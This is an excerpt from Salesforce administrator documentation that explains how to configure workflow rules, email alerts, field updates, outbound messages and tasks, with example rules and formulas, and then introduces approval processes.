Workflow actions created for a workflow rule or approval process can be associated with other workflow rules and approval
processes.

To associate existing workflow actions with a workflow rule:

1. From Setup, click Create > Workflow & Approvals > Workflow Rules.
2. Select the workflow rule.
3. Click Edit in the Workflow Actions section.
4. Click Add Workflow Action in either the Immediate Workflow Actions or Time-Dependent Actions section, depending

on when you want the action to occur, and choose Select Existing Action. See Configuring Workflow Actions on page
3119.

5. Select the type of action to associate with the workflow rule. The Available Actions box lists all existing actions of that
type.

6. Enter the name of a specific action in the text field and click Find.
7. Select the actions in the Available Actions box and use the right arrow to move them to the Selected Actions box. If

necessary, select the left arrow to remove actions from the Available Actions box.
8. Click Save.

To associate existing workflow actions with an approval process:

1. From Setup, click Create > Workflow & Approvals > Approval Processes.
2. Click the name of an approval process.
3. Depending on when you want the action to occur, do one of the following:

• Click Add Existing in the Initial Submission Actions, Final Approval Actions, Final Rejection Actions, or Recall
Actions section.

• Click Show Actions in the Approval Steps section, then click Add Existing in the Approval, Rejection, or Recall
Actions section.

See Selecting Approval Actions on page 3186.
4. Select the type of action you want to associate with the approval process. The Available Actions box lists all existing actions

of the selected type.
5. Enter the name of a specific action in the text field and click Find.
6. Select the actions in the Available Actions box that you want to associate with the approval process, and use the right

arrow to move the actions to the Selected Actions box. If necessary, select the left arrow to remove actions from the
Available Actions box.
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7. Click Save.

See Also:
Managing Workflow Actions

Activating a Workflow Rule

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Tasks, Sites, and Email Alerts are not available in Database.com

User Permissions Needed

“Customize Application”To create or change workflow rules and actions:

Salesforce doesn't trigger a workflow rule until you activate it. To activate a workflow rule, click Activate on the workflow
rule detail page. Click Deactivate to prevent a rule from triggering or if you want to edit the time-dependent actions and time
triggers associated with the rule.

See Also:
Creating Workflow Rules

Managing Workflow Actions
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view workflow rules and actions:

“Customize Application”To create or change workflow rules and actions:

To manage your workflow actions:

1. From Setup, click Create > Workflow & Approvals > Workflow Rules to access the workflow rules list page.
2. Click the name of the rule with the workflow actions you want to edit.
3. Click Edit in the Workflow Actions section.
4. From this page you can:

• Click Edit next to any workflow action or time trigger to modify it.
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• Click Remove next to any workflow action to remove it from the rule. This disassociates the workflow action from the
workflow rule but doesn't delete the workflow action.

• Click Delete next to any time trigger to remove it from the rule. This deletes the time trigger and removes its associated
actions from the workflow rule but does not delete the workflow actions. The workflow actions are still available when
you click Add Workflow Action and choose the Select Existing Action option.

• Click Add Workflow Action in the Immediate Workflow Actions section to add an immediate workflow action to
the workflow rule.

• Click Add Time Trigger to add a time trigger to the workflow rule.
• Click Add Workflow Action next to a time trigger to add time-dependent workflow actions to the time trigger.

5. Click Done.

See Also:
Time-Dependent Action and Time Trigger Considerations
Selecting Existing Actions
Creating Workflow Rules

Managing Email Alerts

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view email alerts:

“Customize Application”To create or change email alerts:

Email alerts are emails generated by a workflow rule or approval process and sent to designated recipients whenever specific
business actions trigger the workflow rule or approval process. Email alerts contain the standard text and list of recipients for
an email. You must specify an email template for email alerts. To use a standard global From address for email alerts, like
support@company.com, set up an organization-wide address first.

To get started using email alerts, from Setup, click Create > Workflow & Approvals > Email Alerts.

From this page you can:

• Create a new email alert.

• Select an existing email alert to view details about it, create a cloned email alert, or view all the rules using it.

• Edit an existing email alert.

• Delete an email alert.

See Also:
Creating Email Alerts for Workflow, Approvals, or Milestones
Workflow Daily Email Limit
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Workflow Daily Email Limit

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create or change workflow rules:

“Customize Application”To create or change email alerts:

The daily limit for emails sent from workflow and approval-related email alerts is 1,000 per standard Salesforce license per
organization. The overall organization limit is 2,000,000. When the daily limit is reached, a warning email goes out to the
default workflow user. If the default workflow user isn't set, then the warning email is sent to an active system administrator.

How the Workflow Daily Email Limit Works

The limit restriction is based on activity in the 24-hour period starting and ending at midnight GMT. Adding or removing
a user license immediately adjusts the limit's total. If you send an email alert to a group, every recipient in that group counts
against your daily workflow email limit.

After your organization has reached its daily workflow email limit:

• Any emails in the workflow queue left over and not sent that day are discarded. Salesforce doesn't try to resend them later.
• If a workflow rule with an action and an email alert is triggered, only the email action is blocked.
• Final approval, final rejection, approval, rejection, and recall email actions are blocked.
• An error message is added to the debug log.

The following items don't count against the workflow email limit:

• Approval notification emails
• Task assignment notifications
• Lead assignment rules notifications
• Case assignment rules notifications
• Case escalation rules notifications
• Force.com sites usage alerts
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Managing Field Updates

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Approval Processes are not available in Database.com

User Permissions Needed

“View Setup and Configuration”To view field updates:

“Customize Application”To define, edit, or delete field updates:

Field updates allow you to automatically specify a field value. Field updates are actions associated with workflow rules, approval
processes, or entitlement processes.

Before you begin using field updates, review Field Update Considerations. To get started using field updates, click Create >
Workflow & Approvals > Field Updates.

From this page you can:

• Define a new field update.

• Select an existing field update to view its details or view workflow rules and approval processes that use it.

• Edit an existing field update.

• Delete a field update.

See Also:
Defining Field Updates
Understanding Cross-Object Field Updates
Field Update Considerations
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Managing Outbound Messages

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Approvals are not available in Database.com

User Permissions Needed

“Customize Application”

AND

“Manage Translation”

AND

“Manage Territories” (if territories are enabled)

To view, define, edit, or delete outbound messages:

An outbound message is a workflow, approval, or milestone action that sends the information you specify to an endpoint you
designate, such as an external service. An outbound message sends the data in the specified fields in the form of a SOAP
message to the endpoint.

To get started using outbound messages, from Setup, click Create > Workflow & Approvals > Outbound Messages.

• Click New Outbound Message to define a new outbound message.

• Click View Message Delivery Status to track the status of an outbound message.

• Select an existing outbound message to view its details or to see if any workflow rules and approval processes use it.

• Click Edit to make changes to an existing outbound message.

• Click Del to delete an outbound message.

Note:  If you don't have this option, your organization doesn't have outbound messages enabled. Contact salesforce.com
to enable outbound messages.

When working with outbound messages, note the following:

• A single SOAP message can include up to 100 notifications. Each notification contains an ID that uniquely identifies a
record, and a reference to the data in the record. Therefore, if the information in the record changes after the notification
is sent, but before the notification is delivered, only the updated information is delivered.

• Messages are queued until they are sent, to preserve message reliability.

• If the endpoint is unavailable, messages will stay in the queue until sent successfully or until they are 24 hours old. After
24 hours, messages are dropped from the queue.

• If a message can't be delivered, the interval between retries increases exponentially, up to a maximum of two hours between
retries.

• Messages are retried independent of their order in the queue. This may result in messages being delivered out of order.

• You can't build an audit trail using outbound messages. While each message should be delivered at least once, it may be
delivered more than once. Also, it may not be delivered at all if delivery cannot be done within 24 hours. Finally, as noted
above, the source object may change after a notification is sent but before it is delivered, so the endpoint will only receive
the latest data, not any intermediate changes.
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• You can create workflow rules and approval processes on junction objects; but you can't create outbound messages on
junction objects.

See Also:
Defining Outbound Messages

Managing Tasks for Workflow and Approvals

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view tasks:

“Customize Application”To create or change tasks:

A task is a type of workflow action that determines the details of an assignment given to a specified user by a workflow rule
or approval process. Create tasks and then associate them with the workflow rules or approval processes that will trigger them.
When a workflow rule or approval process meets the business conditions you set up, any tasks associated with it are assigned
to designated users with the Subject, Status, Priority, and Due Date of the workflow task.

To get started using tasks, from Setup, click Create > Workflow & Approvals > Tasks.

From this page you can:

• Create a new workflow task.

• Select an existing task to view details about it, create a cloned task, or view rules using it.

• Edit an existing task.

• Delete a task.

Note:

• Before you create a task for a custom object, make sure the custom object tracks activities.

• When tasks are created automatically by actions such as clicking the Send An Email button, they don't trigger
task-based workflow rules.

• Tasks aren't available for article types.

See Also:
Creating Tasks for Workflow, Approvals, or Milestones
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Customizing Workflow and Approval Settings
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Approvals are not available in Database.com

User Permissions Needed

“Customize Application”To edit workflow and approval settings:

To customize settings for workflow rules and approval processes:

1. From Setup, click Create > Workflow & Approvals > Settings.
2. Select a Default Workflow User that you want Salesforce to display with a workflow rule when the user that triggered

the rule is not active.

If your organization uses time-dependent actions in workflow rules, you must designate a default workflow user. Salesforce
displays this username in the Created By field for tasks, the Sending User field for email, and the Last Modified
By field for field updates. Salesforce does not display this username for outbound messages. If a problem occurs with a
pending action, the default workflow user receives an email notification.

3. To enable email approval response for your organization, select the Enable Email Approval Response checkbox.

The email approval response feature gives users the ability to approve or reject email approval requests by replying to the
email. Approvers must have the “API Enabled” system permission to approve or reject approval requests via email.

Note: Before enabling email approval response, note that you cannot use this feature with approval processes in
which the assigned approver is a queue, or in a multi-step approval process in which the next approver is manually
chosen after the first step. Also, users that use Microsoft® Word as their email editor must add the comments to
the end of the first line of the reply email instead of the second.

4. Click Save.

When you enable email approval response, Salesforce uses the following default email template for approval processes unless
you specify a custom email template:

[name of requesting user] has requested your approval for
the following item.

To approve or reject this item, reply to this email with
the word APPROVE, APPROVED, YES, REJECT, REJECTED, or NO
in the first line of the email message, or click this link:

[link to approval page]

If replying via email you can also add comments on the
second line. The comments will be stored with the approval
request in Salesforce CRM.

Note: For salesforce.com to process your response the word
APPROVE, APPROVED, YES, REJECT, REJECTED, or NO must be in
the very first line of the reply email. Also, any comment
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must be in the second line.

If your organization has Approvals in Chatter enabled and the approver has opted to receive approval notifications as Chatter
posts, the default email template is appended with:

You can also approve, reject and comment on this request from your Chatter feed:

[link to approval post in Chatter]

If you select a custom email template when configuring an approval response, be sure it contains the above information so
users know how to correctly reply to the email approval request.

See Also:
Email Approval Response FAQ

Notes on Using Workflow Rules
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Standard Objects are not available in Database.com

User Permissions Needed

“View Setup and Configuration”To view workflow rules:

“Customize Application”To create or change workflow rules:

Consider the following when configuring workflow rules:

• Each workflow rule applies to a single object.

• For all custom objects and some standard objects, you can create workflow and approval actions where a change to a detail
record updates a field on the related master record. Cross-object field updates work for custom-to-custom master-detail
relationships, custom-to-standard master-detail relationships, and a few standard-to-standard master-detail relationships.
For more information, see Understanding Cross-Object Field Updates on page 3125.

• The cross-object field update function may depend on certain critical updates being active. From Setup, click Critical
Updates to see if your organization requires any updates.

• If you have workflow rules on converted leads and want to use cross-object field updates on the resulting accounts and
opportunities, you must enable the lead setting Enable Validation and Triggers from Lead Convert.

• Workflow rules on custom objects are automatically deleted if the custom object is deleted.

• The order in which individual actions and types of actions are executed is not guaranteed. However, field update actions
are executed first, followed by other actions.

• To create workflow rules that update case fields based on new case comments or incoming email messages, choose Case
Comment or Email Message from the Select Object drop-down list; Email Message is only available if Email-to-Case
or On-Demand Email-to-Case is enabled. You can only create email message workflow rules for field updates, and case
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comment workflow rules for field updates, email alerts, and outbound messages. For example, you can create a workflow
rule so that an email marked as Is Incoming changes its case's Status from Closed to New.

• Changes you make to records while using Connect Offline are evaluated by workflow rules when you synchronize.

• Salesforce processes rules in the following order:

1. Validation rules
2. Assignment rules
3. Auto-response rules
4. Workflow rules (with immediate actions)
5. Escalation rules

• If a lookup field references a record that has been deleted, Salesforce clears the value of the lookup field by default.
Alternatively, you can choose to prevent records from being deleted if they’re in a lookup relationship.

When Do Workflow Rules Get Triggered?

• Workflow rules can be triggered any time a record is saved or created, depending on your rule criteria. However, rules
created after saving records aren't triggered by those records retroactively.

• Workflow rules are triggered when a standard object in a master-detail relationship is re-parented, even if the object's
evaluation criteria is set to Evaluate the rule when a record is: created, and any time it’s edited
to subsequently meet criteria.

• Saving or creating records can trigger more than one rule.
• Workflow rules only trigger on converted leads if validation and triggers for lead convert are enabled in your organization.
• Workflow rules trigger automatically and are invisible to the user. Alternatively, approval processes allow users to submit

records for approval.
• Workflow rules and entry criteria for approval processes and steps respect the user's locale and aren't triggered when the

user is in a different language than that of the organization.
• If you use record types in your workflow rule criteria whose labels have been translated using the translation workbench,

the translated label value won’t trigger the workflow rule. Workflow criteria evaluate the master label value and ignore the
translated value. To avoid this problem, set the workflow criteria to evaluate the master record type label value by entering
it manually in the Value field.

• Workflow rules can't be triggered by campaign statistic fields, including individual campaign statistics and campaign
hierarchy statistics.

• The following actions don't trigger workflow rules:

◊ Mass replacing picklist values
◊ Mass updating address fields
◊ Mass updating divisions
◊ Changing the territory assignments of accounts and opportunities
◊ Converting leads to person accounts

Workflow Rule Limitations

• You can't create email alerts for workflow rules on activities.
• You can't package workflow rules with time triggers.
• You can't create outbound messages for workflow rules on junction objects.
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Tip:  You can use the Developer Console to debug workflow rules. The Developer Console lets you view debug log
details and information about workflow rules and actions, such as the name of the user who triggered the workflow
rule and the name and ID of the record being evaluated.

See Also:
Creating Workflow Rules

Examples of Workflow Rules
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Customize Application”To create or change workflow rules, email alerts, tasks, field
updates, and outbound messages:

Use the following workflow rule examples to learn how you can implement common business objectives.

Business Processes

Follow Up Before Contract Expires

Follow Up when Platinum Contract Case Closes

Assign Credit Check for New Customer

Notify Account Owner About New, High-Priority Cases

Update Shipment Status if Shipment is Delayed

Cross-Object Processes

Notify Sales VP About Cases Filed for Top Accounts

Set Default Opportunity Name

Set Target Resolution Date for Cases

Update Application Record when Candidate Accepts Job

Deal Management

Track Closed Opportunities

Override Default Opportunity Close Date

Report Lost Opportunities

Report Unassigned Leads

Notifications

Notify Key People About Account Owner Changes
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Set Reminder for Contact Birthday

Set Reminder for High-Value Opportunity Close Date

Notify Account Owner of Updates by Others

See Also:
Workflow and Approvals Overview
Creating Workflow Rules

Business Processes

Follow Up Before Contract Expires

ContractObject

Send an email reminder to the renewal manager 20 days before a contract’s end date.Description

created, and any time it’s edited to subsequently meet criteriaEvaluate the rule when a
record is:

Run this rule if the following criteria are met:
(Contract: Status equals Activated)

Rule Criteria (Filter)

NoneImmediate Actions

20 Days Before Contract: End Date—Email Alert: Send an email reminder to the renewal
manager to confirm whether the client would like an extension.

Time-Dependent
Actions

Follow Up when Platinum Contract Case Closes

This example assumes there is a Contract Type custom picklist used to identify the contract level on cases, and that the
picklist contains the value “Platinum.”

CaseObject

Send a feedback request in email to the case contact seven days after a high-priority case is closed
if the customer has a platinum contract agreement.

Description

created, and any time it’s edited to subsequently meet criteriaEvaluate the rule when a
record is:

Run this rule if the following criteria are met:
(Case: Priority equals High) and
(Case: Closed equals True) and
(Case: Contract Type equals Platinum)

Rule Criteria (Filter)

NoneImmediate Actions
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7 Days After Case: Date/Time Closed—Email Alert: Send a feedback request to the case
contact.

Time-Dependent
Actions

Assign Credit Check for New Customer

This example assumes there is a New Customer custom field on opportunities.

OpportunityObject

Assign the Accounts Receivable (AR) department a task to check the credit of a potential customer
15 days before the opportunity close date if the amount is greater than $50,000.

Description

created, and any time it’s edited to subsequently meet criteriaEvaluate the rule when a
record is:

Run this rule if the following criteria are met:
(Opportunity: Amount greater than 50000) and
(Opportunity: Closed equals False) and
(Opportunity: New Customer equals True)

Rule Criteria (Filter)

NoneImmediate Actions

15 Days Before Opportunity: Close Date—Task: Create a task for users in the Accounts
Receivable role to run a credit check.

Time-Dependent
Actions

Notify Account Owner About New, High-Priority Cases

This example assumes there is a Service Level Agreement custom picklist called SLA that identifies the agreement level on
accounts and contains the value “Platinum.”

CaseObject

Notify the account owner when a high-priority case is created for accounts with a platinum service
level agreement.

Description

createdEvaluate the rule when a
record is:

Run this rule if the following criteria are met:
(Case: Priority equals High) and
(Account: SLA equals Platinum)

Rule Criteria (Filter)

Email Alert: Email the details of the high-priority case to the account owner.Immediate Actions

None.Time-Dependent
Actions

Update Shipment Status if Shipment is Delayed

ShipmentObject

Update the Shipment Status field to “Delayed” if a shipment has exceeded the expected delivery
date and not reached the customer.

Description
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created, and any time it’s edited to subsequently meet criteriaEvaluate the rule when a
record is:

Run this rule if the following criteria are met:
(Shipment: Status not equal to Delivered)

Rule Criteria (Filter)

None.Immediate Actions

1 day after Shipment: Expected Delivery Date—Field Update: Change Shipment Status field
to “Delayed” on Shipment record.

Time-Dependent
Actions

Cross-Object Processes

Notify Sales VP About Cases Filed for Top Accounts

Use the following workflow rule if your sales VP wants to know about any cases filed for top accounts, where top accounts are
determined by size and revenue.

CaseObject

Notify Sales VP about any cases filed for top accounts.Description

createdEvaluate the rule when a
record is:

Run this rule if the following criteria are met:
AND(Account.AnnualRevenue > 500000, Account.NumberOfEmployees > 5000)

Rule Criteria (Filter)

Email Alert: Notify VP about cases for big accounts.Immediate Actions

None.Time-Dependent
Actions

Set Default Opportunity Name

The opportunity naming convention for some companies is Account Name: Opportunity Name. To automate the default
name of each opportunity in your organization, create the following workflow rule.

OpportunityObject

Enforce opportunity naming convention.Description

created, and every time it’s editedEvaluate the rule when a
record is:

Run this rule if the following criteria are met:
NOT(CONTAINS( Name, Account.Name ))

Rule Criteria (Filter)
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Field Update: Set opportunity name to the following formula:

Account.Name & ": " & Name

Immediate Actions

None.Time-Dependent
Actions

Set Target Resolution Date for Cases

This example illustrates how to automatically set a case resolution date based on the value of a field on the associated account.
It uses a custom picklist field on accounts called Support Level, which has three values–Basic, Standard, and Premium–as
well as a custom date field on cases called Target Resolution Date.

Use the following three workflow rule examples to automatically set the target resolution date of a case based on the support
level for the related account.

Set Resolution Date for Basic Support

CaseObject

Sets the case target resolution date for accounts that have basic support level to 30 days from
today.

Description

createdEvaluate the rule when a
record is:

Run this rule if the following formula evaluates to true:
ISPICKVAL(Account.Support_Level__c , "Basic")

Rule Criteria (Filter)

Field Update: Set the Target Resolution Date to Today() + 30Immediate Actions

None.Time-Dependent
Actions

Set Resolution Date for Standard Support

CaseObject

Sets the case target resolution date for accounts that have standard support level to 14 days from
today.

Description

createdEvaluate the rule when a
record is:

Run this rule if the following formula evaluates to true:
ISPICKVAL(Account.Support_Level__c , "Standard")

Rule Criteria (Filter)

Field Update: Set the Target Resolution Date to Today() + 14Immediate Actions

None.Time-Dependent
Actions

Set Resolution Date for Premium Support
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CaseObject

Sets the case target resolution date for accounts that have premium support level to 5 days from
today.

Description

createdEvaluate the rule when a
record is:

Run this rule if the following formula evaluates to true:
ISPICKVAL(Account.Support_Level__c , "Premium")

Rule Criteria (Filter)

Field Update: Set the Target Resolution Date to Today() + 5Immediate Actions

None.Time-Dependent
Actions

Update Application Record when Candidate Accepts Job

Use the following workflow rule if you want to close the Application record when a Candidate accepts a job. Cross-object
field updates to the master record are supported between custom objects in a master-detail relationship.

CandidateObject

Changes the Application Status to “Closed” for the custom Application object when the Candidate
Status for the custom Candidate object changes to “Accepted.”

Description

created, and any time it’s edited to subsequently meet criteriaEvaluate the rule when a
record is:

Run this rule if the following criteria are met:
(Candidate: Status equals Accepted)

Rule Criteria (Filter)

Field Update: Change Application Status field to “Closed” on parent Application record.Immediate Actions

None.Time-Dependent
Actions

Deal Management

Track Closed Opportunities

This example assumes there is a “Closed Opportunities” record type that provides additional information to certain profiles.

Note:  For information on record types, see Record Types Overview on page 2846.

OpportunityObject

Change the record type of closed-won opportunities.Description
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created, and every time it’s editedEvaluate the rule when a
record is:

Run this rule if the following criteria are met:
(Opportunity: Closed equals True) and
(Opportunity: Stage equals Closed Won)

Rule Criteria (Filter)

Field Update: Set the record type to “Closed Opportunities.”Immediate Actions

None.Time-Dependent
Actions

Override Default Opportunity Close Date

OpportunityObject

Override the default close date from the close of the quarter to six months after the opportunity
is created.

Description

createdEvaluate the rule when a
record is:

Run this rule if the following criteria are met:
(Opportunity: Closed equals False)

Rule Criteria (Filter)

Field Update: Use the following formula to set the opportunity close date to six months after
the creation date:

DATE( YEAR(TODAY()) , (MONTH(TODAY()) + 6), DAY(TODAY()))

Immediate Actions

None.Time-Dependent
Actions

Report Lost Opportunities

OpportunityObject

Notify the VP of Sales when a deal is lost if the stage was “Proposal/Price Quote” and the amount
was greater than $1,000,000.

Description

created, and every time it’s editedEvaluate the rule when a
record is:

Run this rule if the following formula evaluates to true:
AND( ISCHANGED(StageName), ISPICKVAL(PRIORVALUE(StageName) ,
"Proposal/Price Quote"), ISPICKVAL(StageName,"Closed Lost"), (Amount
>1000000))

Rule Criteria (Filter)

Email Alert: Notify the VP of Sales role that the deal was lost.Immediate Actions

None.Time-Dependent
Actions
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Report Unassigned Leads

This example assumes that all unassigned leads are placed in an unassigned leads queue by a leads assignment rule.

LeadObject

Ensure that unassigned leads are tracked in a timely manner by notifying the manager if a lead
is not accepted in two days.

Description

created, and any time it’s edited to subsequently meet criteriaEvaluate the rule when a
record is:

Run this rule if the following criteria are met:
Lead Owner equals Unassigned Lead Queue

Rule Criteria (Filter)

None.Immediate Actions

2 Days After Lead: Last Modified Date—Email Alert: Notify the manager role that there
are unassigned leads in the queue that are older than two days.

Time-Dependent
Actions

Send Alert if Quote Line Item Discount Exceeds 40%

Quote Line ItemObject

Ensure that an email alert is sent if a sales rep applies a quote line item discount that exceeds
40%.

Description

created, and any time it’s edited to subsequently meet criteriaEvaluate the rule when a
record is:

Run this rule if the following criteria are met:
Quote Line Item: Discount is greater than 40

Rule Criteria (Filter)

Email Alert: Notify the manager role that the quote line item discount exceeds 40%.Immediate Actions

None.Time-Dependent
Actions

Notifications

Notify Key People About Account Owner Changes

AccountObject

Notify key people in the sales department when the owner of an account changes if the account's
annual revenue is greater than $1,000,000.

Description

created, and every time it’s editedEvaluate the rule when a
record is:
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Run this rule if the following formula evaluates to true:
AND( ISCHANGED(OwnerId), AnnualRevenue > 1000000 )

Rule Criteria (Filter)

Email Alert: Notify the person in the sales operations role of the change in account ownership.Immediate Actions

None.Time-Dependent
Actions

Set Reminder for Contact Birthday

This example assumes there is a Next Birthday custom formula field that uses the following formula to calculate the date
of the contact's next birthday on contact records:

IF(MONTH(Birthdate) > MONTH(TODAY()),DATE(YEAR(TODAY()),MONTH(Birthdate),DAY(Birthdate)),
IF(MONTH(Birthdate) < MONTH(TODAY()),DATE(YEAR(TODAY())+1,MONTH(Birthdate),DAY(Birthdate)),
IF(DAY(Birthdate) >= (DAY(TODAY())),DATE(YEAR(TODAY()),MONTH(Birthdate),DAY(Birthdate)),
DATE(YEAR(TODAY())+1,MONTH(Birthdate),DAY(Birthdate)))))

ContactObject

Send an email to the contact two days before the contact's birthday.Description

createdEvaluate the rule when a
record is:

Run this rule if the following formula evaluates to true:
(Contact: Birthdate not equal to null) and
(Contact: Email not equal to null)

Rule Criteria (Filter)

None.Immediate Actions

2 Days Before Contact: Next Birthday—Email Alert: Send a birthday greeting to the contact's
email address.

Time-Dependent
Actions

Set Reminder for High-Value Opportunity Close Date

OpportunityObject

Remind the opportunity owner and senior management when the close date is approaching for
a large deal, an opportunity that has an amount greater than $10,000. Also, create a follow-up
task for the opportunity owner if the deal is still open when the close date passes.

Description

created, and any time it’s edited to subsequently meet criteriaEvaluate the rule when a
record is:

Run this rule if the following criteria are met:
(Opportunity: Amount greater than 100000) and
(Opportunity: Closed equals False)

Rule Criteria (Filter)

None.Immediate Actions

Time-Dependent
Actions

• 30 Days Before Opportunity: Close Date—Email Alert: Notify the opportunity owner
that 30 days remain.
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• 15 Days Before Opportunity: Close Date—Email Alert: Notify the opportunity owner
that 15 days remain.

• 5 Days After Opportunity: Close Date—Task: Create a follow-up task for the opportunity
owner to update the deal. Email Alert: Notify senior management to involve executives.

Notify Account Owner of Updates by Others

AccountObject

Notify the account owner when someone else updates the account if the account's annual revenue
is greater than $1,000,000.

Description

created, and every time it’s editedEvaluate the rule when a
record is:

Run this rule if the following formula evaluates to true:
AND( (LastModifiedById <> CreatedById), (AnnualRevenue > 1000000) )

Rule Criteria (Filter)

Email Alert: Notify the account owner that someone else has updated the account.Immediate Actions

None.Time-Dependent
Actions

Monitoring the Workflow Queue
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Modify All Data”To manage the workflow queue:

When a workflow rule that has time-dependent actions is triggered, use the workflow queue to view pending actions and
cancel them if necessary.

To view pending actions:

1. From Setup, click Monitoring > Time-Based Workflow.
2. Click Search to view all pending actions for any active workflow rules, or set the filter criteria and click Search to view

only the pending actions that match the criteria. The filter options are:

• Workflow Rule Name: The name of the workflow rule.
• Object: The object that triggered the workflow rule. Enter the object name in the singular form.
• Scheduled Date: The date the pending actions are scheduled to occur.
• Create Date: The date the record that triggered the workflow was created.
• Created By: The user who created the record that triggered the workflow rule.
• Record Name: The name of the record that triggered the workflow rule.

3157

Monitoring the Workflow QueueImplementing Workflow



The filter is not case-sensitive.

To cancel pending actions:

1. Select the box next to the pending actions you want to cancel.
2. Click Delete.

Workflow Terminology
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Approvals, Tasks, and Email Alerts are not available in Database.com

Workflow Rule
A workflow rule sets workflow actions into motion when its designated conditions are met. You can configure workflow
actions to execute immediately when a record meets the conditions in your workflow rule, or set time triggers that execute
the workflow actions on a specific day. If a workflow action hasn’t executed yet, you can view and modify it in the
workflow queue.

Workflow Action
A workflow action is an email alert, field update, outbound message, or task that fires when the conditions of a workflow
rule are met.

Email Alert
Email alerts are workflow and approval actions that are generated using an email template by a workflow rule or approval
process and sent to designated recipients, either Salesforce users or others. Workflow alerts can be sent to any user or
contact, as long as they have a valid email address.

Field Update
Field updates are workflow and approval actions that specify the field you want updated and the new value for it.
Depending on the type of field, you can choose to apply a specific value, make the value blank, or calculate a value based
on a formula you create.

Task
Assigns a task to a user you specify. You can specify the Subject, Status, Priority, and Due Date of the task.
Tasks are workflow and approval actions that are triggered by workflow rules or approval processes.

Outbound Message
An outbound message is a workflow, approval, or milestone action that sends the information you specify to an endpoint
you designate, such as an external service. An outbound message sends the data in the specified fields in the form of a
SOAP message to the endpoint.

Flow
A flow starts out as a process or decision diagram created in the Flow Designer. Once uploaded and run in Salesforce,
it becomes an application for navigating users through a series of screens.
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USING APPROVAL PROCESSES

Approval Processes Overview
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Various user permissions required depending on the action.To use approvals:

Your business runs more efficiently with automated processes. For example, you may already have workflow rules that
automatically send email alerts or assign tasks based on your internal processes. Approvals take automation one step further,
allowing you to specify a sequence of steps that are required to approve a record.

An approval process is an automated process your organization can use to approve records in Salesforce. An approval process
specifies the steps necessary for a record to be approved and who must approve it at each step. A step can apply to all records
included in the process, or just records that meet certain administrator-defined criteria. An approval process also specifies the
actions to take when a record is approved, rejected, recalled, or first submitted for approval.

For example, your organization may have a three-tier process for approving expenses: submitted expenses that are less than
$50 are automatically approved, those over $50 must be approved by a manager, and those over $5,000 must also be approved
by a Vice President. In this example, your approval process would specify the following:

• If an expense record is submitted for approval, lock the record so that users cannot edit it and change the status to
“Submitted.”

• If the amount is $50 or less, automatically approve the request.

• If the amount is greater than $50, send an approval request to the direct manager.

• If the amount is greater than $5,000 and the first approval request is approved, send an approval request to the Vice
President.

• If all approval requests are approved, change the status to “Approved” and unlock the record.

• If any approval requests are rejected, change the status to “Rejected” and unlock the record.

An approval process includes the following elements:

• A name and description to distinguish it from other approval processes.

• Entry criteria if you only want records with certain attributes to be included.

• A designated user who can approve requests.

• Settings to specify who, if anyone, can change a record once it has been submitted for approval.

• Any number of steps that determine the sequence of actions to take when a record matches the criteria. Each step can have
up to 40 actions, 10 of each type: email alerts, field updates, tasks, and outbound messages.

• Up to 40 additional actions that occur when a record is initially submitted.

• Up to 40 additional actions that occur when a record is approved.

• Up to 40 additional actions that occur when a record is rejected.
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• Up to 40 additional actions that occur when a record is recalled.

To begin designing your approval processes, see Getting Started with Approval Processes on page 3160.

See Also:
Creating Approval Processes
Examples of Approval Processes
Approval Process Terminology

Getting Started with Approval Processes
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create approval processes:

An approval process is an automated process your organization can use to approve records in Salesforce. An approval process
specifies the steps necessary for a record to be approved and who must approve it at each step. A step can apply to all records
included in the process, or just records that meet certain administrator-defined criteria. An approval process also specifies the
actions to take when a record is approved, rejected, recalled, or first submitted for approval.

Before you begin creating an approval process:

• Review the Approval Process Checklist to prepare for your implementation and determine what wizard to use.

• Optionally, enable the email approval response option. The email approval response feature gives users the ability to approve
or reject email approval requests by replying to the email. Approvers must have the “API Enabled” system permission to
approve or reject approval requests via email.

To automate your organization's processes:

1. Create an approval process.
2. Add steps to your approval process.
3. Specify initial submission actions.
4. Specify final approval actions.
5. Specify final rejection actions.
6. Specify recall actions.
7. If this is the first approval process you are creating:

• Add the Approval History related list to the appropriate page layout. The Approval History related list lets users submit
approval requests and track a record's progress through an approval process from the record detail page.

• Consider adding the Items To Approve related list to your custom home page layouts. It gives users an instant view of
the approval requests they need to approve or reject.

• Populate all custom hierarchy fields with the appropriate values.
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8. Use the Process Visualizer to display a graphical version of an approval process. The view-only diagram is presented as a
flowchart. The diagram and informational sidebar can help you visualize and understand the defined steps, criteria, and
actions that comprise your approval process.

Note: Standard reports for approval requests are included in both the Administrative Reports folder and the Activity
Reports folder.

See Also:
Choosing an Approval Process Wizard
Approval Process Terminology
Managing Approval Processes
Examples of Approval Processes

Approval Process Checklist

Available in: Enterprise, Unlimited, and Developer Editions

Plan each approval process carefully to ensure a successful implementation. Review the following checklist about preparing
the appropriate information before creating your approval process.

• Prepare an approval request email template.

• Prepare an approval request post template.

• Determine the approval request sender.

• Determine the assigned approver.

• Determine the delegated approver.

• Decide if your approval process needs a filter.

• Design initial submission actions.

• Decide if users can approve requests from a wireless device.

• Determine if users can edit records that are awaiting approval.

• Decide if records should be auto-approved or rejected.

• Determine how many levels your process has.

• Determine the actions when an approval request is approved or rejected.

What email template do you want to use for approval requests?

The email template you specify on an approval process is used when notifying users that an approval request is assigned
to them. You can use the default email template Salesforce offers if it is appropriate for your approval process, or you
can create your own email template. Include the appropriate approval process merge fields to link directly to the approval
request.

If your organization has enabled email approval response, the default email template includes instructions for replying
to an email approval request by typing approve, approved, yes, reject, rejected, or no in the first line of the
email body, and optionally adding comments in the second line.
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What Chatter post template do you want to use for approval requests?

